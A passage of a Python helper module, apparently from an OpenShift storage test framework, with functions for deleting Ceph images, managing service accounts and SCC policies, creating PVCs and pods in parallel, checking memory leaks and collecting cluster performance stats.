where image_uuid is ``f301898c-a192-11e9-852a-1eeeb6975c91``
pool_name (str): The of the pool
Returns:
bool: True if image deleted successfully
False if:
Pool not found
image not found
image not deleted
"""
cmd = ""
valid_error = []
pool_cr = get_pool_cr(pool_name)
if pool_cr is not None:
if pool_cr["kind"] == "CephFilesystem":
interface = "CephFileSystem"
else:
interface = pool_cr["kind"]
logger.info(f"pool {pool_cr} kind is {interface}")
else:
logger.info(
f"Pool {pool_name} has no kind of "
f"{constants.CEPHBLOCKPOOL} "
f"or {constants.CEPHFILESYSTEM}"
)
return False
# Checking if image is present before trying to delete
image_present_results = is_volume_present_in_backend(
interface=interface, image_uuid=img_uuid, pool_name=pool_name
)
# Incase image is present delete
if image_present_results:
if interface == constants.CEPHBLOCKPOOL:
logger.info(
f"Trying to delete image csi-vol-{img_uuid} from pool {pool_name}"
)
valid_error = ["No such file or directory"]
cmd = f"rbd rm -p {pool_name} csi-vol-{img_uuid}"
if interface == constants.CEPHFILESYSTEM:
logger.info(
f"Trying to delete image csi-vol-{img_uuid} from pool {pool_name}"
)
valid_error = [
f"Subvolume 'csi-vol-{img_uuid}' not found",
f"subvolume 'csi-vol-{img_uuid}' does not exist",
]
cmd = f"ceph fs subvolume rm {get_cephfs_name()} csi-vol-{img_uuid} csi"
ct_pod = pod.get_ceph_tools_pod()
try:
ct_pod.exec_ceph_cmd(ceph_cmd=cmd, format=None)
except CommandFailed as ecf:
if any([error in str(ecf) for error in valid_error]):
logger.info(
f"Error occurred while verifying volume is present in backend: "
f"{str(ecf)} ImageUUID: {img_uuid}. Interface type: {interface}"
)
return False
verify_img_delete_result = is_volume_present_in_backend(
interface=interface, image_uuid=img_uuid, pool_name=pool_name
)
if not verify_img_delete_result:
logger.info(f"Image csi-vol-{img_uuid} deleted successfully")
return True
else:
logger.info(f"Image csi-vol-{img_uuid} not deleted successfully")
return False
return False
def create_serviceaccount(namespace):
"""
Create a Serviceaccount
Args:
namespace (str): The namespace for the serviceaccount creation
Returns:
OCS: An OCS instance for the service_account
"""
service_account_data = templating.load_yaml(constants.SERVICE_ACCOUNT_YAML)
service_account_data["metadata"]["name"] = create_unique_resource_name(
"sa", "serviceaccount"
)
service_account_data["metadata"]["namespace"] = namespace
return create_resource(**service_account_data)
def get_serviceaccount_obj(sa_name, namespace):
"""
Get serviceaccount obj
Args:
sa_name (str): Service Account name
namespace (str): The namespace for the serviceaccount creation
Returns:
OCS: An OCS instance for the service_account
"""
ocp_sa_obj = ocp.OCP(kind=constants.SERVICE_ACCOUNT, namespace=namespace)
try:
sa_dict = ocp_sa_obj.get(resource_name=sa_name)
return OCS(**sa_dict)
except CommandFailed:
logger.error("ServiceAccount not found in specified namespace")
def validate_scc_policy(sa_name, namespace, scc_name=constants.PRIVILEGED):
"""
Validate serviceaccount is added to scc of privileged
Args:
sa_name (str): Service Account name
namespace (str): The namespace for the serviceaccount creation
scc_name (str): SCC name
Returns:
bool: True if sc_name is present in scc of privileged else False
"""
sa_name = f"system:serviceaccount:{namespace}:{sa_name}"
logger.info(sa_name)
ocp_scc_obj = ocp.OCP(kind=constants.SCC, namespace=namespace)
scc_dict = ocp_scc_obj.get(resource_name=scc_name)
scc_users_list = scc_dict.get("users")
for scc_user in scc_users_list:
if scc_user == sa_name:
return True
return False
def add_scc_policy(sa_name, namespace):
"""
Adding ServiceAccount to scc anyuid and privileged
Args:
sa_name (str): ServiceAccount name
namespace (str): The namespace for the scc_policy creation
"""
ocp = OCP()
scc_list = [constants.ANYUID, constants.PRIVILEGED]
for scc in scc_list:
out = ocp.exec_oc_cmd(
command=f"adm policy add-scc-to-user {scc} system:serviceaccount:{namespace}:{sa_name}",
out_yaml_format=False,
)
logger.info(out)
def remove_scc_policy(sa_name, namespace):
"""
Removing ServiceAccount from scc anyuid and privileged
Args:
sa_name (str): ServiceAccount name
namespace (str): The namespace for the scc_policy deletion
"""
ocp = OCP()
scc_list = [constants.ANYUID, constants.PRIVILEGED]
for scc in scc_list:
out = ocp.exec_oc_cmd(
command=f"adm policy remove-scc-from-user {scc} system:serviceaccount:{namespace}:{sa_name}",
out_yaml_format=False,
)
logger.info(out)
def craft_s3_command(cmd, mcg_obj=None, api=False):
"""
Crafts the AWS CLI S3 command including the
login credentials and command to be ran
Args:
mcg_obj: An MCG object containing the MCG S3 connection credentials
cmd: The AWSCLI command to run
api: True if the call is for s3api, false if s3
Returns:
str: The crafted command, ready to be executed on the pod
"""
api = "api" if api else ""
if mcg_obj:
base_command = (
f'sh -c "AWS_CA_BUNDLE={constants.SERVICE_CA_CRT_AWSCLI_PATH} '
f"AWS_ACCESS_KEY_ID={mcg_obj.access_key_id} "
f"AWS_SECRET_ACCESS_KEY={mcg_obj.access_key} "
f"AWS_DEFAULT_REGION={mcg_obj.region} "
f"aws s3{api} "
f"--endpoint={mcg_obj.s3_internal_endpoint} "
)
string_wrapper = '"'
else:
base_command = f"aws s3{api} --no-sign-request "
string_wrapper = ""
return f"{base_command}{cmd}{string_wrapper}"
def get_current_test_name():
"""
A function to return the current test name in a parsed manner
Returns:
str: The test name.
"""
return os.environ.get("PYTEST_CURRENT_TEST").split(":")[-1].split(" ")[0]
def setup_pod_directories(pod_obj, dir_names):
"""
Creates directories on the specified pod.
Directories created under the respective test name directory.
Args:
pod_obj: A pod object on which to create directories
dir_names: A list of directories names to create.
Returns:
list: A list of all the full paths of the created directories
"""
full_dirs_path = []
test_name = get_current_test_name()
pod_obj.exec_cmd_on_pod(command=f"mkdir -p {test_name}")
for cur_dir in dir_names:
current = f"{test_name}/{cur_dir}"
pod_obj.exec_cmd_on_pod(command=f"mkdir -p {current}")
full_dirs_path.append(current)
return full_dirs_path
def wait_for_resource_count_change(
func_to_use,
previous_num,
namespace,
change_type="increase",
min_difference=1,
timeout=20,
interval=2,
**func_kwargs,
):
"""
Wait for a change in total count of PVC or pod
Args:
func_to_use (function): Function to be used to fetch resource info
Supported functions: pod.get_all_pvcs(), pod.get_all_pods()
previous_num (int): Previous number of pods/PVCs for comparison
namespace (str): Name of the namespace
change_type (str): Type of change to check. Accepted values are
'increase' and 'decrease'. Default is 'increase'.
min_difference (int): Minimum required difference in PVC/pod count
timeout (int): Maximum wait time in seconds
interval (int): Time in seconds to wait between consecutive checks
Returns:
True if difference in count is greater than or equal to
'min_difference'. False in case of timeout.
"""
try:
for sample in TimeoutSampler(
timeout, interval, func_to_use, namespace, **func_kwargs
):
if func_to_use == pod.get_all_pods:
current_num = len(sample)
else:
current_num = len(sample["items"])
if change_type == "increase":
count_diff = current_num - previous_num
else:
count_diff = previous_num - current_num
if count_diff >= min_difference:
return True
except TimeoutExpiredError:
return False
def verify_pv_mounted_on_node(node_pv_dict):
"""
Check if mount point of a PV exists on a node
Args:
node_pv_dict (dict): Node to PV list mapping
eg: {'node1': ['pv1', 'pv2', 'pv3'], 'node2': ['pv4', 'pv5']}
Returns:
dict: Node to existing PV list mapping
eg: {'node1': ['pv1', 'pv3'], 'node2': ['pv5']}
"""
existing_pvs = {}
for node_name, pvs in node_pv_dict.items():
cmd = f"oc debug nodes/{node_name} -- df"
df_on_node = run_cmd(cmd)
existing_pvs[node_name] = []
for pv_name in pvs:
if f"/pv/{pv_name}/" in df_on_node:
existing_pvs[node_name].append(pv_name)
return existing_pvs
def converge_lists(list_to_converge):
"""
Function to flatten and remove the sublist created during future obj
Args:
list_to_converge (list): arg list of lists, eg: [[1,2],[3,4]]
Returns:
list (list): return converged list eg: [1,2,3,4]
"""
return [item for sublist in list_to_converge for item in sublist]
def create_multiple_pvc_parallel(sc_obj, namespace, number_of_pvc, size, access_modes):
"""
Funtion to create multiple PVC in parallel using threads
Function will create PVCs based on the available access modes
Args:
sc_obj (str): Storage Class object
namespace (str): The namespace for creating pvc
number_of_pvc (int): NUmber of pvc to be created
size (str): size of the pvc eg: '10Gi'
access_modes (list): List of access modes for PVC creation
Returns:
pvc_objs_list (list): List of pvc objs created in function
"""
obj_status_list, result_lists = ([] for i in range(2))
with ThreadPoolExecutor() as executor:
for mode in access_modes:
result_lists.append(
executor.submit(
create_multiple_pvcs,
sc_name=sc_obj.name,
namespace=namespace,
number_of_pvc=number_of_pvc,
access_mode=mode,
size=size,
)
)
result_list = [result.result() for result in result_lists]
pvc_objs_list = converge_lists(result_list)
# Check for all the pvcs in Bound state
with ThreadPoolExecutor() as executor:
for objs in pvc_objs_list:
obj_status_list.append(
executor.submit(wait_for_resource_state, objs, "Bound", 90)
)
if False in [obj.result() for obj in obj_status_list]:
raise TimeoutExpiredError
return pvc_objs_list
def create_pods_parallel(
pvc_list,
namespace,
interface,
pod_dict_path=None,
sa_name=None,
raw_block_pv=False,
dc_deployment=False,
node_selector=None,
):
"""
Function to create pods in parallel
Args:
pvc_list (list): List of pvcs to be attached in pods
namespace (str): The namespace for creating pod
interface (str): The interface backed the PVC
pod_dict_path (str): pod_dict_path for yaml
sa_name (str): sa_name for providing permission
raw_block_pv (bool): Either RAW block or not
dc_deployment (bool): Either DC deployment or not
node_selector (dict): dict of key-value pair to be used for nodeSelector field
eg: {'nodetype': 'app-pod'}
Returns:
pod_objs (list): Returns list of pods created
"""
future_pod_objs = []
# Added 300 sec wait time since in scale test once the setup has more
# PODs time taken for the pod to be up will be based on resource available
wait_time = 300
if raw_block_pv and not pod_dict_path:
pod_dict_path = constants.CSI_RBD_RAW_BLOCK_POD_YAML
with ThreadPoolExecutor() as executor:
for pvc_obj in pvc_list:
future_pod_objs.append(
executor.submit(
create_pod,
interface_type=interface,
pvc_name=pvc_obj.name,
do_reload=False,
namespace=namespace,
raw_block_pv=raw_block_pv,
pod_dict_path=pod_dict_path,
sa_name=sa_name,
dc_deployment=dc_deployment,
node_selector=node_selector,
)
)
pod_objs = [pvc_obj.result() for pvc_obj in future_pod_objs]
# Check for all the pods are in Running state
# In above pod creation not waiting for the pod to be created because of threads usage
with ThreadPoolExecutor() as executor:
for obj in pod_objs:
future_pod_objs.append(
executor.submit(
wait_for_resource_state, obj, "Running", timeout=wait_time
)
)
# If pods not up raise exception/failure
if False in [obj.result() for obj in future_pod_objs]:
raise TimeoutExpiredError
return pod_objs
def delete_objs_parallel(obj_list):
"""
Function to delete objs specified in list
Args:
obj_list(list): List can be obj of pod, pvc, etc
Returns:
bool: True if obj deleted else False
"""
threads = list()
for obj in obj_list:
process = threading.Thread(target=obj.delete)
process.start()
threads.append(process)
for process in threads:
process.join()
return True
def memory_leak_analysis(median_dict):
"""
Function to analyse Memory leak after execution of test case Memory leak is
analyzed based on top output "RES" value of ceph-osd daemon, i.e.
``list[7]`` in code.
More Detail on Median value: For calculating memory leak require a constant
value, which should not be start or end of test, so calculating it by
getting memory for 180 sec before TC execution and take a median out of it.
Memory value could be different for each nodes, so identify constant value
for each node and update in median_dict
Args:
median_dict (dict): dict of worker nodes and respective median value
eg: median_dict = {'worker_node_1':102400, 'worker_node_2':204800, ...}
Usage::
test_case(.., memory_leak_function):
.....
median_dict = helpers.get_memory_leak_median_value()
.....
TC execution part, memory_leak_fun will capture data
....
helpers.memory_leak_analysis(median_dict)
....
"""
# dict to store memory leak difference for each worker
diff = {}
for worker in node.get_worker_nodes():
memory_leak_data = []
if os.path.exists(f"/tmp/{worker}-top-output.txt"):
with open(f"/tmp/{worker}-top-output.txt", "r") as f:
data = f.readline()
list = data.split(" ")
list = [i for i in list if i]
memory_leak_data.append(list[7])
else:
logger.info(f"worker {worker} memory leak file not found")
raise UnexpectedBehaviour
number_of_lines = len(memory_leak_data) - 1
# Get the start value form median_dict arg for respective worker
start_value = median_dict[f"{worker}"]
end_value = memory_leak_data[number_of_lines]
logger.info(f"Median value {start_value}")
logger.info(f"End value {end_value}")
# Convert the values to kb for calculations
if start_value.__contains__("g"):
start_value = float(1024**2 * float(start_value[:-1]))
elif start_value.__contains__("m"):
start_value = float(1024 * float(start_value[:-1]))
else:
start_value = float(start_value)
if end_value.__contains__("g"):
end_value = float(1024**2 * float(end_value[:-1]))
elif end_value.__contains__("m"):
end_value = float(1024 * float(end_value[:-1]))
else:
end_value = float(end_value)
# Calculate the percentage of diff between start and end value
# Based on value decide TC pass or fail
diff[worker] = ((end_value - start_value) / start_value) * 100
logger.info(f"Percentage diff in start and end value {diff[worker]}")
if diff[worker] <= 20:
logger.info(f"No memory leak in worker {worker} passing the test")
else:
logger.info(f"There is a memory leak in worker {worker}")
logger.info(f"Memory median value start of the test {start_value}")
logger.info(f"Memory value end of the test {end_value}")
raise UnexpectedBehaviour
def get_memory_leak_median_value():
"""
Function to calculate memory leak Median value by collecting the data for 180 sec
and find the median value which will be considered as starting point
to evaluate memory leak using "RES" value of ceph-osd daemon i.e. list[7] in code
Returns:
median_dict (dict): dict of worker nodes and respective median value
"""
median_dict = {}
timeout = 180 # wait for 180 sec to evaluate memory leak median data.
logger.info(f"waiting for {timeout} sec to evaluate the median value")
time.sleep(timeout)
for worker in node.get_worker_nodes():
memory_leak_data = []
if os.path.exists(f"/tmp/{worker}-top-output.txt"):
with open(f"/tmp/{worker}-top-output.txt", "r") as f:
data = f.readline()
list = data.split(" ")
list = [i for i in list if i]
memory_leak_data.append(list[7])
else:
logger.info(f"worker {worker} memory leak file not found")
raise UnexpectedBehaviour
median_dict[f"{worker}"] = statistics.median(memory_leak_data)
return median_dict
def refresh_oc_login_connection(user=None, password=None):
"""
Function to refresh oc user login
Default login using kubeadmin user and password
Args:
user (str): Username to login
password (str): Password to login
"""
user = user or config.RUN["username"]
if not password:
filename = os.path.join(
config.ENV_DATA["cluster_path"], config.RUN["password_location"]
)
with open(filename) as f:
password = f.read()
ocs_obj = ocp.OCP()
ocs_obj.login(user=user, password=password)
def rsync_kubeconf_to_node(node):
"""
Function to copy kubeconfig to OCP node
Args:
node (str): OCP node to copy kubeconfig if not present
"""
# ocp_obj = ocp.OCP()
filename = os.path.join(
config.ENV_DATA["cluster_path"], config.RUN["kubeconfig_location"]
)
file_path = os.path.dirname(filename)
master_list = node.get_master_nodes()
ocp_obj = ocp.OCP()
check_auth = "auth"
check_conf = "kubeconfig"
node_path = "/home/core/"
if check_auth not in ocp_obj.exec_oc_debug_cmd(
node=master_list[0], cmd_list=[f"ls {node_path}"]
):
ocp.rsync(src=file_path, dst=f"{node_path}", node=node, dst_node=True)
elif check_conf not in ocp_obj.exec_oc_debug_cmd(
node=master_list[0], cmd_list=[f"ls {node_path}auth"]
):
ocp.rsync(src=file_path, dst=f"{node_path}", node=node, dst_node=True)
def get_failure_domin():
"""
Function is used to getting failure domain of pool
Returns:
str: Failure domain from cephblockpool
"""
ct_pod = pod.get_ceph_tools_pod()
out = ct_pod.exec_ceph_cmd(ceph_cmd="ceph osd crush rule dump", format="json")
assert out, "Failed to get cmd output"
for crush_rule in out:
if constants.CEPHBLOCKPOOL.lower() in crush_rule.get("rule_name"):
for steps in crush_rule.get("steps"):
if "type" in steps:
return steps.get("type")
def wait_for_ct_pod_recovery():
"""
In case the of node failures scenarios, in which the selected node is
running the ceph tools pod, we'll want to wait for the pod recovery
Returns:
bool: True in case the ceph tools pod was recovered, False otherwise
"""
try:
_ = get_admin_key()
except CommandFailed as ex:
logger.info(str(ex))
if "connection timed out" in str(ex):
logger.info(
"Ceph tools box was running on the node that had a failure. "
"Hence, waiting for a new Ceph tools box pod to spin up"
)
wait_for_resource_count_change(
func_to_use=pod.get_all_pods,
previous_num=1,
namespace=config.ENV_DATA["cluster_namespace"],
timeout=120,
selector=constants.TOOL_APP_LABEL,
)
return True
else:
return False
return True
def label_worker_node(node_list, label_key, label_value):
"""
Function to label worker node for running app pods on specific worker nodes.
Args:
node_list (list): List of node name
label_key (str): Label_key to be added in worker
label_value (str): Label_value
"""
ocp_obj = OCP()
out = ocp_obj.exec_oc_cmd(
command=f"label node {' '.join(node_list)} {label_key}={label_value}",
out_yaml_format=False,
)
logger.info(out)
def remove_label_from_worker_node(node_list, label_key):
"""
Function to remove label from worker node.
Args:
node_list (list): List of node name
label_key (str): Label_key to be remove from worker node
"""
ocp_obj = OCP()
out = ocp_obj.exec_oc_cmd(
command=f"label node {' '.join(node_list)} {label_key}-", out_yaml_format=False
)
logger.info(out)
def get_pods_nodes_logs():
"""
Get logs from all pods and nodes
Returns:
dict: node/pod name as key, logs content as value (string)
"""
all_logs = {}
all_pods = pod.get_all_pods()
all_nodes = node.get_node_objs()
for node_obj in all_nodes:
node_name = node_obj.name
log_content = node.get_node_logs(node_name)
all_logs.update({node_name: log_content})
for pod_obj in all_pods:
try:
pod_name = pod_obj.name
log_content = pod.get_pod_logs(pod_name)
all_logs.update({pod_name: log_content})
except CommandFailed:
pass
return all_logs
def get_logs_with_errors(errors=None):
"""
From logs of all pods and nodes, get only logs
containing any of specified errors
Args:
errors (list): List of errors to look for
Returns:
dict: node/pod name as key, logs content as value; may be empty
"""
all_logs = get_pods_nodes_logs()
output_logs = {}
errors_list = constants.CRITICAL_ERRORS
if errors:
errors_list = errors_list + errors
for name, log_content in all_logs.items():
for error_msg in errors_list:
if error_msg in log_content:
logger.debug(f"Found '{error_msg}' in log of {name}")
output_logs.update({name: log_content})
log_path = f"{ocsci_log_path()}/{name}.log"
with open(log_path, "w") as fh:
fh.write(log_content)
return output_logs
def modify_osd_replica_count(resource_name, replica_count):
"""
Function to modify osd replica count to 0 or 1
Args:
resource_name (str): Name of osd i.e, 'rook-ceph-osd-0-c9c4bc7c-bkf4b'
replica_count (int): osd replica count to be changed to
Returns:
bool: True in case if changes are applied. False otherwise
"""
ocp_obj = ocp.OCP(
kind=constants.DEPLOYMENT, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
params = f'{{"spec": {{"replicas": {replica_count}}}}}'
resource_name = "-".join(resource_name.split("-")[0:4])
return ocp_obj.patch(resource_name=resource_name, params=params)
def modify_deployment_replica_count(deployment_name, replica_count):
"""
Function to modify deployment replica count,
i.e to scale up or down deployment
Args:
deployment_name (str): Name of deployment
replica_count (int): replica count to be changed to
Returns:
bool: True in case if changes are applied. False otherwise
"""
ocp_obj = ocp.OCP(
kind=constants.DEPLOYMENT, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
params = f'{{"spec": {{"replicas": {replica_count}}}}}'
return ocp_obj.patch(resource_name=deployment_name, params=params)
def collect_performance_stats(dir_name):
"""
Collect performance stats and saves them in file in json format.
dir_name (str): directory name to store stats.
Performance stats include:
IOPs and throughput percentage of cluster
CPU, memory consumption of each nodes
"""
from ocs_ci.ocs.cluster import CephCluster
log_dir_path = os.path.join(
os.path.expanduser(config.RUN["log_dir"]),
f"failed_testcase_ocs_logs_{config.RUN['run_id']}",
f"{dir_name}_performance_stats",
)
if not os.path.exists(log_dir_path):
logger.info(f"Creating directory {log_dir_path}")
os.makedirs(log_dir_path)
performance_stats = {}
external = config.DEPLOYMENT["external_mode"]
if external:
# Skip collecting performance_stats for external mode RHCS cluster
logger.info("Skipping status collection for external mode")
else:
ceph_obj = CephCluster()
# Get iops and throughput percentage of cluster
iops_percentage = ceph_obj.get_iops_percentage()
throughput_percentage = ceph_obj.get_throughput_percentage()
performance_stats["iops_percentage"] = iops_percentage
performance_stats["throughput_percentage"] = throughput_percentage
# ToDo: Get iops and throughput percentage of each nodes
# Get the cpu and memory of each nodes from adm top
master_node_utilization_from_adm_top = (
node.get_node_resource_utilization_from_adm_top(node_type="master")
)
worker_node_utilization_from_adm_top = (
node.get_node_resource_utilization_from_adm_top(node_type="worker")
)
# Get the cpu and memory from describe of nodes
master_node_utilization_from_oc_describe = (
node.get_node_resource_utilization_from_oc_describe(node_type="master")
)
worker_node_utilization_from_oc_describe = (
node.get_node_resource_utilization_from_oc_describe(node_type="worker")
)
performance_stats["master_node_utilization"] = master_node_utilization_from_adm_top
performance_stats["worker_node_utilization"] = worker_node_utilization_from_adm_top
performance_stats[
"master_node_utilization_from_oc_describe"
] = master_node_utilization_from_oc_describe
performance_stats[
"worker_node_utilization_from_oc_describe"
] = worker_node_utilization_from_oc_describe
file_name = os.path.join(log_dir_path, "performance")
with open(file_name, "w") as outfile:
json.dump(performance_stats, outfile)
def validate_pod_oomkilled(
pod_name, namespace=defaults.ROOK_CLUSTER_NAMESPACE, container=None
):
"""
Validate pod oomkilled message are found on log
Args:
pod_name (str): Name of the pod
namespace (str): Namespace of the pod
container (str): Name of the container
Returns:
bool : True if oomkill messages are not found on log.
False Otherwise.
Raises:
Assertion if failed to fetch logs
"""
rc = True
try:
pod_log = pod.get_pod_logs(
pod_name=pod_name, namespace=namespace, container=container, previous=True
)
result = pod_log.find("signal: killed")
if result != -1:
rc = False
except CommandFailed as ecf:
assert (
f'previous terminated container "{container}" in pod "{pod_name}" not found'
in str(ecf)
), "Failed to fetch logs"
return rc
def validate_pods_are_running_and_not_restarted(pod_name, pod_restart_count, namespace):
"""
Validate given pod is in running state and not restarted or re-spinned
Args:
pod_name (str): Name of the pod
pod_restart_count (int): Restart count of pod
namespace (str): Namespace of the pod
Returns:
bool : True if pod is in running state and restart
count matches the previous one
"""
ocp_obj = ocp.OCP(kind=constants.POD, namespace=namespace)
pod_obj = ocp_obj.get(resource_name=pod_name)
restart_count = (
pod_obj.get("status").get("containerStatuses")[0].get("restartCount")
)
pod_state = pod_obj.get("status").get("phase")
if pod_state == "Running" and restart_count == pod_restart_count:
logger.info("Pod is running state and restart count matches with previous one")
return True
logger.error(
f"Pod is in {pod_state} state and restart count of pod {restart_count}"
)
logger.info(f"{pod_obj}")
return False
def calc_local_file_md5_sum(path):
"""
Calculate and return the MD5 checksum of a local file
Arguments:
path(str): The path to the file
Returns:
str: The MD5 checksum
"""
with open(path, "rb") as file_to_hash:
file_as_bytes = file_to_hash.read()
return hashlib.md5(file_as_bytes).hexdigest()
def retrieve_default_ingress_crt():
"""
Copy the default ingress certificate from the router-ca secret
to the local code runner for usage with boto3.
"""
default_ingress_crt_b64 = (
OCP(
kind="secret",
namespace="openshift-ingress-operator",
resource_name="router-ca",
)
.get()
.get("data")
.get("tls.crt")
)
decoded_crt = base64.b64decode(default_ingress_crt_b64).decode("utf-8")
with open(constants.DEFAULT_INGRESS_CRT_LOCAL_PATH, "w") as crtfile:
crtfile.write(decoded_crt)
def storagecluster_independent_check():
"""
Check whether the storagecluster is running in independent mode
by checking the value of spec.externalStorage.enable
Returns:
bool: True if storagecluster is running on external mode False otherwise
"""
storage_cluster = (
OCP(kind="StorageCluster", namespace=config.ENV_DATA["cluster_namespace"])
.get()
.get("items")[0]
)
return bool(
storage_cluster.get("spec", {}).get("externalStorage", {}).get("enable", False)
)
def get_pv_size(storageclass=None):
"""
Get Pv size from requested storageclass
Args:
storageclass (str): Name of storageclass
Returns:
list: list of pv's size
"""
return_list = []
ocp_obj = ocp.OCP(kind=constants.PV)
pv_objs = ocp_obj.get()["items"]
for pv_obj in pv_objs:
if pv_obj["spec"]["storageClassName"] == storageclass:
return_list.append(pv_obj["spec"]["capacity"]["storage"])
return return_list
def get_pv_names():
"""
Get Pv names
Returns:
list: list of pv names
"""
ocp_obj = ocp.OCP(kind=constants.PV)
pv_objs = ocp_obj.get()["items"]
return [pv_obj["metadata"]["name"] for pv_obj in pv_objs]
def default_volumesnapshotclass(interface_type):
"""
Return default VolumeSnapshotClass based on interface_type
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
Returns:
OCS: VolumeSnapshotClass Instance
"""
external = config.DEPLOYMENT["external_mode"]
if interface_type == constants.CEPHBLOCKPOOL:
resource_name = (
constants.DEFAULT_EXTERNAL_MODE_VOLUMESNAPSHOTCLASS_RBD
if external
else constants.DEFAULT_VOLUMESNAPSHOTCLASS_RBD
)
elif interface_type == constants.CEPHFILESYSTEM:
resource_name = (
constants.DEFAULT_EXTERNAL_MODE_VOLUMESNAPSHOTCLASS_CEPHFS
if external
else constants.DEFAULT_VOLUMESNAPSHOTCLASS_CEPHFS
)
base_snapshot_class = OCP(
kind=constants.VOLUMESNAPSHOTCLASS, resource_name=resource_name
)
return OCS(**base_snapshot_class.data)
def get_snapshot_content_obj(snap_obj):
"""
Get volume snapshot content of a volume snapshot
Args:
snap_obj (OCS): OCS instance of kind VolumeSnapshot
Returns:
OCS: OCS instance of kind VolumeSnapshotContent
"""
data = dict()
data["api_version"] = snap_obj.api_version
data["kind"] = constants.VOLUMESNAPSHOTCONTENT
snapcontent = snap_obj.ocp.get(resource_name=snap_obj.name, out_yaml_format=True)[
"status"
]["boundVolumeSnapshotContentName"]
data["metadata"] = {"name": snapcontent, "namespace": snap_obj.namespace}
snapcontent_obj = OCS(**data)
snapcontent_obj.reload()
return snapcontent_obj
def wait_for_pv_delete(pv_objs):
"""
Wait for PVs to delete. Delete PVs having ReclaimPolicy 'Retain'
Args:
pv_objs (list): OCS instances of kind PersistentVolume
"""
for pv_obj in pv_objs:
if (
pv_obj.data.get("spec").get("persistentVolumeReclaimPolicy")
== constants.RECLAIM_POLICY_RETAIN
):
wait_for_resource_state(pv_obj, constants.STATUS_RELEASED)
pv_obj.delete()
pv_obj.ocp.wait_for_delete(resource_name=pv_obj.name, timeout=180)
@retry(UnexpectedBehaviour, tries=40, delay=10, backoff=1)
def fetch_used_size(cbp_name, exp_val=None):
"""
Fetch used size in the pool
Args:
exp_val(float): Expected size in GB
Returns:
float: Used size in GB
"""
ct_pod = pod.get_ceph_tools_pod()
rados_status = ct_pod.exec_ceph_cmd(ceph_cmd=f"rados df -p {cbp_name}")
size_bytes = rados_status["pools"][0]["size_bytes"]
# Convert size to GB
used_in_gb = float(format(size_bytes / constants.GB, ".4f"))
if exp_val and abs(exp_val - used_in_gb) > 1.5:
raise UnexpectedBehaviour(
f"Actual {used_in_gb} and expected size {exp_val} not "
f"matching. Retrying"
)
return used_in_gb
def get_full_test_logs_path(cname, fname=None):
"""
Getting the full path of the logs file for particular test
this function use the inspect module to find the name of the caller function, so it need
to be call once from the main test function.
the output is in the form of
ocsci_log_path/<full test file path>/<test filename>/<test class name>/<test function name>
Args:
cname (obj): the Class object which was run and called this function
fname (str): the function name for different tests log path
Return:
str : full path of the test logs relative to the ocs-ci base logs path
"""
# the module path relative to ocs-ci base path
log_file_name = (inspect.stack()[1][1]).replace(f"{os.getcwd()}/", "")
# The name of the class
mname = type(cname).__name__
if fname is None:
fname = inspect.stack()[1][3]
# the full log path (relative to ocs-ci base path)
full_log_path = f"{ocsci_log_path()}/{log_file_name}/{mname}/{fname}"
return full_log_path
def get_mon_pdb():
"""
Check for Mon PDB
Returns:
disruptions_allowed (int): Count of mon allowed disruption
min_available_mon (int): Count of minimum mon available
max_unavailable_mon (int): Count of maximun mon unavailable
"""
pdb_obj = OCP(
kind=constants.POD_DISRUPTION_BUDGET,
resource_name=constants.MON_PDB,
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
)
disruptions_allowed = pdb_obj.get().get("status").get("disruptionsAllowed")
min_available_mon = pdb_obj.get().get("spec").get("minAvailable")
max_unavailable_mon = pdb_obj.get().get("spec").get("maxUnavailable")
return disruptions_allowed, min_available_mon, max_unavailable_mon
def verify_pdb_mon(disruptions_allowed, max_unavailable_mon):
"""
Compare between the PDB status and the expected PDB status
Args:
disruptions_allowed (int): the expected number of disruptions_allowed
max_unavailable_mon (int): the expected number of max_unavailable_mon
return:
bool: True if the expected pdb state equal to actual pdb state, False otherwise
"""
logger.info("Check mon pdb status")
mon_pdb = get_mon_pdb()
result = True
if disruptions_allowed != mon_pdb[0]:
result = False
logger.error(
f"The expected disruptions_allowed is: {disruptions_allowed}.The actual one is {mon_pdb[0]}"
)
if max_unavailable_mon != mon_pdb[2]:
result = False
logger.error(
f"The expected max_unavailable_mon is {max_unavailable_mon}.The actual one is {mon_pdb[2]}"
)
return result
@retry(CommandFailed, tries=10, delay=30, backoff=1)
def run_cmd_verify_cli_output(
cmd=None, expected_output_lst=(), cephtool_cmd=False, debug_node=None
):
"""
Run command and verify its output
Args:
cmd(str): cli command
expected_output_lst(set): A set of strings that need to be included in the command output.
cephtool_cmd(bool): command on ceph-tool pod
debug_node(str): name of node
Returns:
bool: True of all strings are included in the command output, False otherwise
"""
if cephtool_cmd is True:
tool_pod = pod.get_ceph_tools_pod()
cmd_start = f"oc rsh -n openshift-storage {tool_pod.name} "
cmd = f"{cmd_start} {cmd}"
elif debug_node is not None:
cmd_start = f"oc debug nodes/{debug_node} -- chroot /host /bin/bash -c "
cmd = f'{cmd_start} "{cmd}"'
out = run_cmd(cmd=cmd)
logger.info(out)
for expected_output in expected_output_lst:
if expected_output not in out:
return False
return True
def check_rbd_image_used_size(
pvc_objs, usage_to_compare, rbd_pool=constants.DEFAULT_BLOCKPOOL, expect_match=True
):
"""
Check if RBD image used size of the PVCs are matching with the given value
Args:
pvc_objs (list): List of PVC objects
usage_to_compare (str): Value of image used size to be compared with actual value. eg: "5GiB"
rbd_pool (str): Name of the pool
expect_match (bool): True to verify the used size is equal to 'usage_to_compare' value.
False to verify the used size is not equal to 'usage_to_compare' value.
Returns:
bool: True if the verification is success for all the PVCs, False otherwise
"""
ct_pod = pod.get_ceph_tools_pod()
no_match_list = []
for pvc_obj in pvc_objs:
rbd_image_name = pvc_obj.get_rbd_image_name
du_out = ct_pod.exec_ceph_cmd(
ceph_cmd=f"rbd du -p {rbd_pool} {rbd_image_name}",
format="",
)
used_size = "".join(du_out.strip().split()[-2:])
if expect_match:
if usage_to_compare != used_size:
logger.error(
f"Rbd image {rbd_image_name} of PVC {pvc_obj.name} did not meet the expectation."
f" Expected used size: {usage_to_compare}. Actual used size: {used_size}. "
f"Rbd du out: {du_out}"
)
no_match_list.append(pvc_obj.name)
else:
if usage_to_compare == used_size:
logger.error(
f"Rbd image {rbd_image_name} of PVC {pvc_obj.name} did not meet the expectation. "
f"Expected the used size to be diferent than {usage_to_compare}. "
